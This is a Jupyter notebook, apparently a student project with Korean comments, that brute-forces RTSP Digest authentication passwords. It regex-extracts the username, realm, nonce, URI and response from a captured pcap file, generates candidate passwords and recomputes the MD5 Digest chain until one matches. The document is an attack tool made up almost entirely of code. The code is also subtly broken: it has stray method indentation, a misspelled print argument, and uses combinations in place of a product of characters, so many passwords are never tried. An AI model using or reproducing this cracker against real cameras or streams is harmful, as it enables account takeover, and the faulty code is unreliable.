In [ ]:
import os
import re
import sys
import codecs
import hashlib
import itertools
import time
from scapy.all import *

In [ ]:
class Digest_password_cracker:
    def __init__(self):
        return None

In [ ]:
    def extract_packet_data(pcap_file_data):
        # 찾아야 하는 바이트 열에 대한 패턴을 입력합니다.
        method_pattern = "(SETUP|DESCRIBE)"
        username_pattern = "(username=\"([a-zA-Z0-9]+))"
        realm_pattern = "(realm=\"([a-zA-Z0-9]+))"
        nonce_pattern = "(nonce=\"([a-zA-Z0-9]+))"
        uri_pattern = "(uri=\"(.+)\"\,)"
        response_pattern = "(response=\"([a-zA-Z0-9]+))"

        # 바이트열에서 찾아야 하는 값을 찾습니다.
        method = re.search(method_pattern, pcap_file_data)
        if method:
            method = method.group(1)
        else:
            print("RTSP 연결 과정이 설정되지 않았습니다.")
            sys.exit(1)

        username = re.search(username_pattern, pcap_file_data)
        if username:
            username = username.group(2)

        realm = re.search(realm_pattern, pcap_file_data)
        if realm:
            realm = realm.group(2)

        nonce = re.search(nonce_pattern, pcap_file_data)
        if nonce:
            nonce = nonce.group(2)

        uri = re.search(uri_pattern, pcap_file_data)
        if uri:
            uri = uri.group(2)

        response = re.search(response_pattern, pcap_file_data)
        if response:
            response = response.group(2)

        return_data = {
            'method':method,
            'username':username,
            'realm':realm,
            'nonce':nonce,
            'uri':uri,
            'response':response
        }

        return return_data

In [ ]:
def get_password(length):
    str_list = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ' # 비밀번호를 생성할 문자열 시드
    passwords = [] # 비밀번호를 저장

    for length in range(1,length+1): # 비밀번호의 길이 생성
        password_cycle = itertools.combinations(str_list,length) # 문자열의 조합 튜플 생성
        for i in password_cycle: # 순회하면서, 튜플을 문자열로 변환
            passwords.append("".join(i))
            
    with open('./passwd.txt','w') as f:
        f.writelines(passwords)
        
    return passwords

In [ ]:
    def calc_hash(packet_data, length):
        # 딕셔너리로부터 데이터를 추출함
        method = packet_data['method']
        username = packet_data['username']
        realm = packet_data['realm']
        nonce = packet_data['nonce']
        uri = packet_data['uri']
        response = packet_data['response']
        
        passwords = get_password(length) # rute-Forcing 공격을 위한, 비밀번호 리스트 생성 
        print("-"*90)
        print("비밀번호 리스트 생성 완료!!")
        print("-"*90)
        
        # 두번째 단계: md5(METHOD:rtsp://ip/urn)
        input_str = method+":"+uri
        input_str = input_str.encode('utf-8')

        md5_2 = hashlib.md5()
        md5_2.update(input_str)
        md5_2 = md5_2.hexdigest()
        
        password_cnt = 0
        for password in passwords:
            # 첫번째 단계: md5(username:realm:password)
            input_str = username+":"+realm+":"+password
            input_str = input_str.encode('utf-8')

            md5_1 = hashlib.md5()
            md5_1.update(input_str)
            md5_1 = md5_1.hexdigest()

            # 세번째 단계: md5(hash1:nonce:hash2)
            input_str = md5_1+":"+nonce+":"+md5_2
            input_str = input_str.encode('utf-8')

            md5_3 = hashlib.md5()
            md5_3.update(input_str)
            md5_3 = md5_3.hexdigest()
            
            password_cnt = password_cnt + 1
            print("\r 비밀번호 대입 완료: {0} / {1}".format(password_cnt,len(passwords)), ends="")
            
            # 비밀번호를 찾은 경우
            if md5_3 == response: 
                print("비밀번호를 찾았습니다!")
                print("비밀번호: ",password)
                return 0
            
        # 비밀번호를 찾지 못한 경우
        print("찾은 비밀번호가 없습니다. 길이를 늘려 시도해주세요.")
        return 0

In [ ]:
def main():
    # pcap_file_dir = input("파일 경로를 입력해주세요.")
    # length = input("비밀번호의 길이를 입력해주세요.")
    length = 10

    # 코드가 시작한 시간을 기록합니다.
    start_time = time.time()

    # PCAP 파일의 경로를 추출합니다.
    pcap_file_dir = "D://Virtual_Machine//VM_ImageFiles//kali-linux-2022.3-vmware-amd64//kali-linux-2022.3-vmware-amd64.vmwarevm//ShareFiles"
    pcap_file_names = os.listdir(pcap_file_dir)
    print("-"*90)
    print(".pcap 파일 경로 설정 완료!!")

    # PCAP 파일을 읽어들입니다.
    pcap_file_data = ""
    with codecs.open(os.path.join(pcap_file_dir,pcap_file_names[0]), 'r', encoding='utf-8', errors='ignore') as f:
        pcap_file_data = f.read()
    print("-"*90)
    print(".pcap 파일 읽기 완료!!")

    # PCAP에서 필요한 데이터를 추출합니다.
    packet_data = extract_packet_data(pcap_file_data)
    print("-"*90)
    print(".pcap 파일 데이터 추출 완료!!")

    # 해시값을 계산하며, 비밀번호를 찾습니다.
    calc_hash(packet_data, length)

    # 총 소요시간을 기록합니다.
    end_time = time.time()
    print("-"*90)
    print("총 소요시간: {0}".format(end_time-start_time))

In [ ]:
if __name__ == "__main__":
    main()

# 참고: 비밀번호를 생성하는 경우의 수가 많아, 메모리 오류가 나는 경우가 있습니다.
# 이 경우, 코드를 구동하는 PC의 가상메모리를 늘려주시면 해결됩니다.

## 참고자료
- [RTSP 인증 방식](https://m.blog.naver.com/PostView.naver?isHttpsRedirect=true&blogId=bcknightt&logNo=220006031922)
- [Digest 방식](https://en.wikipedia.org/wiki/Digest_access_authentication)
- [BruteForce 비밀번호 생성 참고](https://ruinick.tistory.com/13)

## 제작정보
- 제작자: 김동영 (klgh1256@s.hallym.ac.kr)
- 제작일자: 2022년 08월 22일